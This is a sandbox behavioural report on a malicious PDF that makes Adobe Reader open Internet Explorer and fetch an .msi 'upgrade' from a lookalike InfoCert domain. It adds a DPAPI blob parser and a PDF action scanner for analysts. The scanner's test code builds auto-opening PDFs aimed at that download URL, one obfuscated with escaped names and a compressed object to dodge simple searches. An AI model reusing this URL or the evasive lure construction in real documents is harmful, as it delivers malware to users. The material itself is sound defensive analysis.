Analysis
max time kernel: 119s
max time network: 140s
platform: windows7_x64
resource: win7-en-20211014
submitted: 19-10-2021 11:13

Behavioral task: behavioral1
Sample: 107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755.pdf
Resource: win7-en-20211014

General
Target: 107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755.pdf
Size: 166KB
MD5: 6b09106a8d4839ebb9555bba8aeff0c2
SHA1: 953ee746472e54e3a5fb3174975305afa51dc01b
SHA256: 107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755
SHA512: bd9f8fcb0cc2f640377bbff67bfeedc8f4e9a71e629b54e3b29a20301bbfbdaf32f0b104aed66a518647893acaacd734a951fa564c51c42a7b0a17640790a755
Malware Config

Signatures

Modifies Internet Explorer settings 39 IoCs
Processes: iexplore.exe, IEXPLORE.EXE
All keys below are under \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer (description | ioc | process):
- Key created | Main | iexplore.exe
- Key created | GPU | iexplore.exe
- Key created | InternetRegistry | iexplore.exe
- Key created | LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
- Key created | Main\WindowsSearch | IEXPLORE.EXE
- Key created | LowRegistry | iexplore.exe
- Key created | Toolbar\WebBrowser | iexplore.exe
- Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = 005bca32ebc4d701 | iexplore.exe
- Key created | DomainSuggestion\FileNames\ | iexplore.exe
- Key created | PageSetup | iexplore.exe
- Key created | Toolbar | iexplore.exe
- Set value (str) | Main\WindowsSearch\Version = "WS not running" | iexplore.exe
- Set value (str) | Main\FullScreen = "no" | iexplore.exe
- Key created | DOMStorage\drivehq.com | IEXPLORE.EXE
- Key created | DomainSuggestion | iexplore.exe
- Set value (int) | Recovery\AdminActive\{574DACC1-30DE-11EC-8392-52886B4C53F4} = "0" | iexplore.exe
- Key created | Recovery\PendingRecovery | iexplore.exe
- Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005bf5749d3a275447873d564a46cb193600000000020000000000106600000001000020000000e67654ab719dbe87e6852a372c790492204ec31b70123f98eeb8c85c79131e7a000000000e80000000020000200000003b3db435f4549ffa8dd82a5a00aa3e8088c262e77cd9223f93ab97677bead32f200000009685a9e6eae5f109d7a9f2c381c0f803678e2070eb313c7c966426bfede52e6c4000000071c0d1b1fe072f59a0795710d5515fba74989ee64a1806bd2c459b32fd4a4df3241f61350a84f4150ae05d0eec67ce61582fee78019a6169b23ea7ccb18a1b5f | iexplore.exe
- Set value (str) | DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
- Key created | IETld\LowMic | iexplore.exe
- Key created | IntelliForms | iexplore.exe
- Set value (data) | Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
- Key created | DOMStorage | IEXPLORE.EXE
- Set value (str) | Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
- Key created | DomainSuggestion\FileNames | iexplore.exe
- Key created | Zoom | iexplore.exe
- Set value (int) | Main\CompatibilityFlags = "0" | iexplore.exe
- Key created | LowRegistry\DOMStorage | iexplore.exe
- Set value (int) | Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
- Set value (int) | DOMStorage\drivehq.com\NumberOfSubdomains = "1" | IEXPLORE.EXE
- Key created | TabbedBrowsing | iexplore.exe
- Key created | TabbedBrowsing\NewTabPage | iexplore.exe
- Set value (int) | DomainSuggestion\NextUpdateDate = "341414180" | iexplore.exe
- Key created | BrowserEmulation\LowMic | iexplore.exe
- Key created | Recovery\AdminActive | iexplore.exe
- Key created | Main\WindowsSearch | iexplore.exe
- Key created | Main | IEXPLORE.EXE
- Set value (int) | TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
- Set value (data) | TabbedBrowsing\NewTabPage\MFV = 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 | iexplore.exe
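The DecayDateQueue value above is not opaque noise: its first 20 bytes (a version word of 1 followed by the GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb) are the fixed header that Windows DPAPI writes in front of every CryptProtectData blob, which Internet Explorer uses for per-user state such as this. The parser below is an added example and is not part of the sandbox report or its tooling. It takes the blob exactly as listed above, validates the header, and reads out the master-key GUID, the cipher and hash identifiers and the flags word, so an analyst can tell a DPAPI-protected value from an attacker-written payload and knows which user's master key would be needed to decrypt it (flags is 0, not CRYPTPROTECT_LOCAL_MACHINE, so it is scoped to the profile with SID S-1-5-21-2955169046-2371869340-1800780948-1000). The field layout is the documented DPAPI blob format and the ALG_ID names are from wincrypt.h; the Window_Placement value from the same list is used as a negative case, since it starts with its own structure size (0x2c) rather than the DPAPI header.

```python
"""Parse the header of a Windows DPAPI (CryptProtectData) blob.

Added example for this report. DECAY_DATE_QUEUE is the registry value
TabbedBrowsing\\NewTabPage\\DecayDateQueue copied from the IoC list above.
"""
import struct
import uuid

# Fixed provider GUID that follows dwVersion == 1 in every DPAPI blob.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # flag bit: machine scope instead of user scope

# CryptoAPI ALG_ID values DPAPI records in the blob (wincrypt.h).
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8003: "CALG_MD5",
             0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800E: "CALG_SHA_512"}

# The value from the report, split by field so each length word is visible.
DECAY_DATE_QUEUE = bytes.fromhex(
    "01000000"                                  # dwVersion
    "d08c9ddf0115d1118c7a00c04fc297eb"          # guidProvider
    "01000000"                                  # dwMasterKeyVersion
    "5bf5749d3a275447873d564a46cb1936"          # guidMasterKey
    "00000000"                                  # dwFlags
    "02000000" "0000"                           # szDescription: one UTF-16 NUL
    "10660000" "00010000"                       # algCrypt, dwAlgCryptLen
    "20000000" "e67654ab719dbe87e6852a372c790492204ec31b70123f98eeb8c85c79131e7a"  # salt
    "00000000"                                  # pbHmacKey (none)
    "0e800000" "00020000"                       # algHash, dwAlgHashLen
    "20000000" "3b3db435f4549ffa8dd82a5a00aa3e8088c262e77cd9223f93ab97677bead32f"  # HMAC key
    "20000000" "9685a9e6eae5f109d7a9f2c381c0f803678e2070eb313c7c966426bfede52e6c"  # ciphertext
    "40000000" "71c0d1b1fe072f59a0795710d5515fba74989ee64a1806bd2c459b32fd4a4df3"
    "241f61350a84f4150ae05d0eec67ce61582fee78019a6169b23ea7ccb18a1b5f"            # signature
)


def _u32(buf: bytes, off: int):
    (v,) = struct.unpack_from("<I", buf, off)
    return v, off + 4


def _guid(buf: bytes, off: int):
    return uuid.UUID(bytes_le=buf[off:off + 16]), off + 16


def _counted(buf: bytes, off: int):
    """Read a DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("length field runs past end of blob")
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob: bytes) -> dict:
    """Split a DPAPI blob into its fields; raises ValueError if it is not one."""
    if len(blob) < 20:
        raise ValueError("too short for a DPAPI header")
    off = 0
    version, off = _u32(blob, off)
    provider, off = _guid(blob, off)
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    mk_version, off = _u32(blob, off)
    master_key, off = _guid(blob, off)
    flags, off = _u32(blob, off)
    desc, off = _counted(blob, off)        # UTF-16LE, NUL terminated
    alg_crypt, off = _u32(blob, off)
    alg_crypt_len, off = _u32(blob, off)   # key size in bits
    salt, off = _counted(blob, off)
    strong, off = _counted(blob, off)      # legacy "strong" key, usually empty
    alg_hash, off = _u32(blob, off)
    alg_hash_len, off = _u32(blob, off)
    hmac_key, off = _counted(blob, off)
    data, off = _counted(blob, off)
    sign, off = _counted(blob, off)
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} trailing bytes after signature")
    return {
        "master_key_guid": str(master_key),
        "master_key_version": mk_version,
        "scope": "machine" if flags & CRYPTPROTECT_LOCAL_MACHINE else "user",
        "flags": flags,
        "description": desc.decode("utf-16-le", "replace").rstrip("\x00"),
        "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "cipher_bits": alg_crypt_len,
        "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "hash_bits": alg_hash_len,
        "salt": salt, "strong": strong, "hmac_key": hmac_key,
        "ciphertext": data, "signature": sign,
    }


def is_dpapi_blob(blob: bytes) -> bool:
    """Cheap classifier for REG_BINARY values pulled from a sandbox report."""
    try:
        parse_dpapi_blob(blob)
        return True
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    for k, v in parse_dpapi_blob(DECAY_DATE_QUEUE).items():
        print(f"{k:20} {v.hex() if isinstance(v, bytes) else v}")
```

The parse shows a user-scope blob bound to master key 9d74f55b-273a-4754-873d-564a46cb1936, AES-256 with SHA-512 HMAC, 32 bytes of ciphertext and a 64-byte signature: routine IE state that no sandbox can decrypt without that user's master key, and nothing an analyst needs to chase further. The same classifier applied to other REG_BINARY IoCs separates DPAPI-protected values from raw data that malware wrote.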
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- PID 1328 AcroRd32.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- PID 1500 iexplore.exe
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
- PID 1328 AcroRd32.exe (4 IoCs)
- PID 1500 iexplore.exe (2 IoCs)
- PID 392 IEXPLORE.EXE (4 IoCs)
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
- PID 1328 AcroRd32.exe wrote to memory of PID 1500 iexplore.exe (4 IoCs)
- PID 1500 iexplore.exe wrote to memory of PID 392 IEXPLORE.EXE (4 IoCs)
Processes
1. C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe, PID 1328
   Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755.pdf"
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Program Files\Internet Explorer\iexplore.exe, PID 1500 (spawned by PID 1328)
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://infocert-dike.firstcloudit.com/download/aggiornamenti/Windows/Dike_Infocert_upgrade.msi
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      3. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE, PID 392 (spawned by PID 1500)
         Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:2
         - Modifies Internet Explorer settings
         - Suspicious use of SetWindowsHookEx
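The process tree is the whole story of this run under Adobe Reader 9: AcroRd32.exe started iexplore.exe with a URL to an .msi, IE spawned its usual low-integrity content process, and the only WriteProcessMemory targets are each process's own child, which is what process creation looks like rather than injection into an unrelated process. The report does not show how the PDF expressed that URL, so the scanner below is an added example, not the sample's contents and not the sandbox's code. It finds the action dictionaries that reach outside a document (/URI, /Launch, /JavaScript, /GoToR, /SubmitForm), undoes the #xx name escaping that hides keys such as /URI from a naive grep, inflates FlateDecode streams so actions parked in compressed objects are seen, and reports whether an /OpenAction or /AA trigger fires them without a click. The two PDFs it runs on are constructed here for the example and only reuse the URL recorded above; the regex approach is deliberately tolerant of malformed files, which a strict parser would reject and which Reader often still opens.

```python
"""Static triage of PDF actions (added example, not from the sandbox report)."""
import re
import zlib

# A name token runs until whitespace or a delimiter; any byte may be written
# as #xx, so /#55RI is the same name as /URI (ISO 32000-1, 7.3.5).
_NAME_RE = re.compile(rb"/((?:[^\s/\[\]<>(){}%#]|#[0-9A-Fa-f]{2})+)")
_HEX_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
# Literal (...) or hexadecimal <...> string object.
_STRING_RE = rb"(?:\((?P<lit>(?:[^()\\]|\\.)*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)"
# Action dictionaries are typed by /S; these types leave the document.
_ACTION_RE = re.compile(rb"/S\s*/(URI|Launch|JavaScript|GoToR|SubmitForm)\b")
# Key that carries the target for each action type.
_TARGET_KEY = {b"URI": b"URI", b"Launch": b"F", b"JavaScript": b"JS",
               b"GoToR": b"F", b"SubmitForm": b"F"}
_LIT_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}

# URL from the iexplore.exe command line above; the PDFs below are constructed.
URL = ("https://infocert-dike.firstcloudit.com/download/aggiornamenti/"
       "Windows/Dike_Infocert_upgrade.msi")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes inside name tokens so obfuscated keys match plain ones."""
    def fix(m):
        return b"/" + _HEX_ESC_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(1))
    return _NAME_RE.sub(fix, data)


def decode_string(m) -> str:
    """Turn a matched (...) or <...> string object into text."""
    if m.group("hex") is not None:
        digits = re.sub(rb"\s", b"", m.group("hex"))
        if len(digits) % 2:                 # odd final digit is padded with 0
            digits += b"0"
        return bytes.fromhex(digits.decode("ascii")).decode("latin-1")

    def unescape(e):
        c = e.group(1)
        if c.isdigit():                     # \ddd octal escape
            return bytes([int(c, 8) & 0xFF])
        return _LIT_ESCAPES.get(c, c)       # \( \) \\ map to themselves
    return re.sub(rb"\\([0-7]{1,3}|.)", unescape, m.group("lit")).decode("latin-1")


def inflate_streams(pdf: bytes) -> bytes:
    """Inflate every stream that is zlib data; object streams hide dictionaries there."""
    out = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", pdf, re.S):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue                        # not FlateDecode, skip
    return b"\n".join(out)


def triage(pdf: bytes) -> dict:
    """Report automatic triggers and every outward-facing action, with its target."""
    views = [("raw", normalize_names(pdf))]
    inflated = inflate_streams(pdf)
    if inflated:
        views.append(("inflated", normalize_names(inflated)))
    auto = any(b"/OpenAction" in d or b"/AA" in d for _, d in views)
    actions = []
    for source, data in views:
        for m in _ACTION_RE.finditer(data):
            kind = m.group(1)
            end = data.find(b"endobj", m.start())   # stay inside this object
            window = data[m.start(): end if end != -1 else m.start() + 1024]
            t = re.search(rb"/" + _TARGET_KEY[kind] + rb"\s*" + _STRING_RE, window)
            actions.append({"type": kind.decode(), "source": source,
                            "target": decode_string(t) if t else None})
    return {"auto": auto, "actions": actions}


# Constructed sample 1: plain /OpenAction pointing at a /URI action.
SAMPLE_PLAIN = (b"%PDF-1.4\n"
                b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
                b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
                b"3 0 obj << /Type /Action /S /URI /URI (" + URL.encode() + b") >> endobj\n"
                b"trailer << /Root 1 0 R >>\n%%EOF\n")


def build_obfuscated() -> bytes:
    """Constructed sample 2: escaped names, hex string, action inside a Flate stream."""
    hidden = b"<< /Type /Action /S /#55RI /#55RI <" + URL.encode().hex().encode() + b"> >>"
    packed = zlib.compress(hidden)
    return (b"%PDF-1.5\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /#4fpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"4 0 obj << /Filter /FlateDecode /Length " + str(len(packed)).encode()
            + b" >>\nstream\n" + packed + b"\nendstream endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for name, doc in (("plain", SAMPLE_PLAIN), ("obfuscated", build_obfuscated())):
        print(name, triage(doc))
```

Both constructed files come back with the same verdict, auto-triggered URI action to the .msi URL, even though a byte search for "/URI" finds nothing in the second one. Run against the real sample, a hit of this kind explains the AcroRd32.exe to iexplore.exe hop in the tree; a /Launch or /JavaScript hit would change the triage priority, and no hit at all with /ObjStm or an unusual /Filter present means the scan has not seen the whole file yet.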
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5: 3e1f81568a2d757ce2837fe7c4ef6532
SHA1: 0f7f437180a4ce3d2c68942fbb759254e07a314d
SHA256: bfa749a0c488b16fafe60c0d69d1a6aafa3036e865a5bb39c637ee6e51170f2b
SHA512: 92bc01d75fb2d8e22fe235562a419ca56013823fdc1636749809265df03d1c85b0063ca1bccc2c178c018c298b4715525e022b8f826e0952dc74ee46359e9a75

(path not captured)
MD5: 54a2d5a6213f60f206bd8854991fa879
SHA1: 6f86c9878a997fdd2aac56657742674fdfe4c831
SHA256: 085acbabb33f99eab6cd4bd59526c73d704f03c117106239237c9a8c75b0b5b5
SHA512: 29420e7d801881732e13deb4ac0e88bf6c80024350fc4e07cb29d6166503dfab1d9289111d6094c33285da5bb54c43379bd148f0ad5ad6fd8cf012b0e819aba1

(path not captured)
MD5: 2f8d8ed0f5ad58559d1ac7a181842e7d
SHA1: 114d2bf6ad79ab18c924b54dcaa88bf89b958751
SHA256: a467a3ff73a56a14b7b207fef0eb663c7764256d4b57d0507b0159c2fd927336
SHA512: 7a82c504826588dda2be2bcdfd7dd03c99290ff7e400cf4a8e90af25cd96cd9240f99ce2db289c50fed258bcf30fc6289cfb62826c67311ea08e9ff716500a82